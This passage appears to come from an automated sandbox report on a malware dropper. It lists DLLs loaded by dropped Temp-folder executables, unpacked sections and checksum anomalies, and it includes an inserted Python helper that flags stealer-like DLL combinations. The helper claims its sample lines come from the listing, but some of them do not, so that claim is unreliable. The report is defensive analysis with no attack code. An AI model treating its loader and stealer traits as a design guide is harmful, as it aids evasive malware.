Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\DP4Z2JGIRNCYT3CKHONMY.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\DP4Z2JGIRNCYT3CKHONMY.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\DP4Z2JGIRNCYT3CKHONMY.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\DP4Z2JGIRNCYT3CKHONMY.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
Source: C:\Program Files\Mozilla Firefox\firefox.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\compatibility.ini
Source: Window Recorder Window detected: More than 3 window changes detected
Source: file.exe Static file information: File size 2994688 > 1048576
Source: file.exe Static PE information: Raw size of opmmjkup is bigger than: 0x100000 < 0x2af800
Source: Binary string: my_library.pdbU source: 7451ae0b11.exe, 0000000B.00000003.2960373733.0000000004BCB000.00000004.00001000.00020000.00000000.sdmp, 7451ae0b11.exe, 0000000B.00000002.3001129617.000000000016C000.00000040.00000001.01000000.0000000E.sdmp, num.exe, 00000025.00000000.3281198847.0000000000C1C000.00000008.00000001.01000000.0000001A.sdmp
Source: Binary string: my_library.pdb source: 7451ae0b11.exe, 0000000B.00000003.2960373733.0000000004BCB000.00000004.00001000.00020000.00000000.sdmp, 7451ae0b11.exe, 0000000B.00000002.3001129617.000000000016C000.00000040.00000001.01000000.0000000E.sdmp, num.exe, 00000025.00000000.3281198847.0000000000C1C000.00000008.00000001.01000000.0000001A.sdmp
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 7YW0363WEKP7ULOI0QRA.exe, 00000003.00000002.2506913833.0000000000B12000.00000040.00000001.01000000.00000006.sdmp, 7YW0363WEKP7ULOI0QRA.exe, 00000003.00000003.2373622075.0000000005130000.00000004.00001000.00020000.00000000.sdmp
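The "Section loaded" entries above record every system DLL each process mapped, which is a compact capability profile once grouped per process: winhttp/dnsapi plus schannel/ncryptsslp means outbound TLS, wbemcomn means WMI, mscoree means a .NET host, rstrtmgr is the Restart Manager that stealers commonly use to release locked browser database files. The following Python is an added triage helper, not part of the report or of any tool it names. It parses a constructed excerpt written in the report's own line format (including the "Jump to behavior" link text some lines carry) and applies a DLL-to-capability table and a "stealer-shaped" rule that are both assumptions of this example; a stock utility such as taskkill.exe loading wbemcomn.dll and amsi.dll is its ordinary WMI use, so the hints are a starting point for review, not verdicts.

```python
import re

# Constructed excerpt in the report's "Source: <process> Section loaded: <dll>" format.
# These are a few lines picked from the listing above, not a full capture.
SAMPLE_LINES = r"""
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Section loaded: mscoree.dll
"""

# The process path may contain spaces, so match lazily up to the fixed "Section loaded:" marker;
# anything after the DLL name (such as the page's "Jump to behavior" link text) is ignored.
LINE_RE = re.compile(r"^Source:\s+(?P<proc>.+?)\s+Section loaded:\s+(?P<dll>\S+)")

# Assumed DLL-to-capability hints used by this example (not an official taxonomy).
CAPABILITY_HINTS = {
    "network": {"wininet.dll", "winhttp.dll", "urlmon.dll", "dnsapi.dll",
                "mswsock.dll", "wsock32.dll", "webio.dll"},
    "tls": {"schannel.dll", "ncryptsslp.dll", "mskeyprotect.dll"},
    "crypto": {"ncrypt.dll", "dpapi.dll", "rsaenh.dll", "cryptsp.dll"},
    "wmi": {"wbemcomn.dll"},
    "amsi": {"amsi.dll"},
    "dotnet": {"mscoree.dll", "clr.dll", "mscoreei.dll"},
    "restart_manager": {"rstrtmgr.dll"},
}


def parse_loaded_modules(text):
    """Group DLL names by process path, dropping repeats but keeping first-load order."""
    by_proc = {}
    for line in text.strip().splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        mods = by_proc.setdefault(m["proc"], [])
        dll = m["dll"].lower()
        if dll not in mods:
            mods.append(dll)
    return by_proc


def capabilities(modules):
    """Sorted capability names whose hint set intersects the loaded modules."""
    loaded = set(modules)
    return sorted(cap for cap, dlls in CAPABILITY_HINTS.items() if loaded & dlls)


def stealer_shaped(caps):
    """Heuristic (an assumption of this example, not a verdict): network access plus
    Windows crypto plus the Restart Manager are the three pieces an infostealer needs
    to unlock browser databases, decrypt their contents and upload the result."""
    return {"network", "crypto", "restart_manager"} <= set(caps)


def summarize(text):
    """Per-process summary: unique modules, capability hints and the stealer heuristic."""
    out = {}
    for proc, mods in parse_loaded_modules(text).items():
        caps = capabilities(mods)
        out[proc] = {"modules": mods, "capabilities": caps,
                     "stealer_shaped": stealer_shaped(caps)}
    return out


if __name__ == "__main__":
    for proc, info in summarize(SAMPLE_LINES).items():
        flag = "  <-- stealer-shaped" if info["stealer_shaped"] else ""
        print(f"{proc.rsplit(chr(92), 1)[-1]}: {', '.join(info['capabilities'])}{flag}")
```

Feed it the full "Section loaded" listing from a report and the output collapses hundreds of lines into one line per process; the processes worth opening first are the ones in a user-writable directory whose profile combines network, crypto and Restart Manager, or that load mscoree.dll without being a known .NET application.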

Data Obfuscation

Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Unpacked PE file: 3.2.7YW0363WEKP7ULOI0QRA.exe.b10000.0.unpack :EW;.rsrc:W;.idata :W;mljriapp:EW;mudtavgt:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Unpacked PE file: 4.2.S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe.e10000.0.unpack :EW;.rsrc:W;.idata :W; :EW;jqddeztg:EW;hzelrcyv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;jqddeztg:EW;hzelrcyv:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 5.2.skotes.exe.aa0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;jqddeztg:EW;hzelrcyv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;jqddeztg:EW;hzelrcyv:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Unpacked PE file: 11.2.7451ae0b11.exe.140000.0.unpack :EW;.rsrc :W;.idata :W; :EW;xpxnzipx:EW;atgrbfaq:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;xpxnzipx:EW;atgrbfaq:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Unpacked PE file: 29.2.W7N881PI98FKFOKWDI7HCS7W.exe.a40000.0.unpack :EW;.rsrc:W;.idata :W;mljriapp:EW;mudtavgt:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Unpacked PE file: 30.2.7451ae0b11.exe.140000.0.unpack :EW;.rsrc :W;.idata :W; :EW;xpxnzipx:EW;atgrbfaq:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;xpxnzipx:EW;atgrbfaq:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\DP4Z2JGIRNCYT3CKHONMY.exe Unpacked PE file: 33.2.DP4Z2JGIRNCYT3CKHONMY.exe.9f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;jqddeztg:EW;hzelrcyv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;jqddeztg:EW;hzelrcyv:EW;.taggant:EW;
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: 58ce8f976c.exe.8.dr Static PE information: real checksum: 0x2e55c9 should be: 0x2e2609
Source: num.exe.8.dr Static PE information: real checksum: 0x0 should be: 0xdb9be
Source: S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe.0.dr Static PE information: real checksum: 0x1cf020 should be: 0x1cc05d
Source: 8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe.12.dr Static PE information: real checksum: 0x2c41f0 should be: 0x2c478b
Source: random[1].exe.8.dr Static PE information: real checksum: 0x2e55c9 should be: 0x2e2609
Source: 7YW0363WEKP7ULOI0QRA.exe.0.dr Static PE information: real checksum: 0x2c41f0 should be: 0x2c478b
Source: W7N881PI98FKFOKWDI7HCS7W.exe.10.dr Static PE information: real checksum: 0x2c41f0 should be: 0x2c478b
Source: ZVNI3QDRJUMHB5ZEQG5Z2C.exe.12.dr Static PE information: real checksum: 0x1cf020 should be: 0x1cc05d
Source: random[1].exe0.8.dr Static PE information: real checksum: 0x2166de should be: 0x21ab5b
Source: skotes.exe.4.dr Static PE information: real checksum: 0x1cf020 should be: 0x1cc05d
Source: DP4Z2JGIRNCYT3CKHONMY.exe.10.dr Static PE information: real checksum: 0x1cf020 should be: 0x1cc05d
Source: file.exe Static PE information: real checksum: 0x2e55c9 should be: 0x2e2609
Source: 7451ae0b11.exe.8.dr Static PE information: real checksum: 0x2166de should be: 0x21ab5b
Source: num[1].exe.8.dr Static PE information: real checksum: 0x0 should be: 0xdb9be
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name: opmmjkup
Source: file.exe Static PE information: section name: dvfrhkft
Source: file.exe Static PE information: section name: .taggant
Source: 7YW0363WEKP7ULOI0QRA.exe.0.dr Static PE information: section name:
Source: 7YW0363WEKP7ULOI0QRA.exe.0.dr Static PE information: section name: .idata
Source: 7YW0363WEKP7ULOI0QRA.exe.0.dr Static PE information: section name: mljriapp
Source: 7YW0363WEKP7ULOI0QRA.exe.0.dr Static PE information: section name: mudtavgt
Source: 7YW0363WEKP7ULOI0QRA.exe.0.dr Static PE information: section name: .taggant
Source: S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe.0.dr Static PE information: section name:
Source: S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe.0.dr Static PE information: section name: .idata
Source: S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe.0.dr Static PE information: section name:
Source: S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe.0.dr Static PE information: section name: jqddeztg
Source: S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe.0.dr Static PE information: section name: hzelrcyv
Source: S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe.0.dr Static PE information: section name: .taggant
Source: skotes.exe.4.dr Static PE information: section name:
Source: skotes.exe.4.dr Static PE information: section name: .idata
Source: skotes.exe.4.dr Static PE information: section name:
Source: skotes.exe.4.dr Static PE information: section name: jqddeztg
Source: skotes.exe.4.dr Static PE information: section name: hzelrcyv
Source: skotes.exe.4.dr Static PE information: section name: .taggant
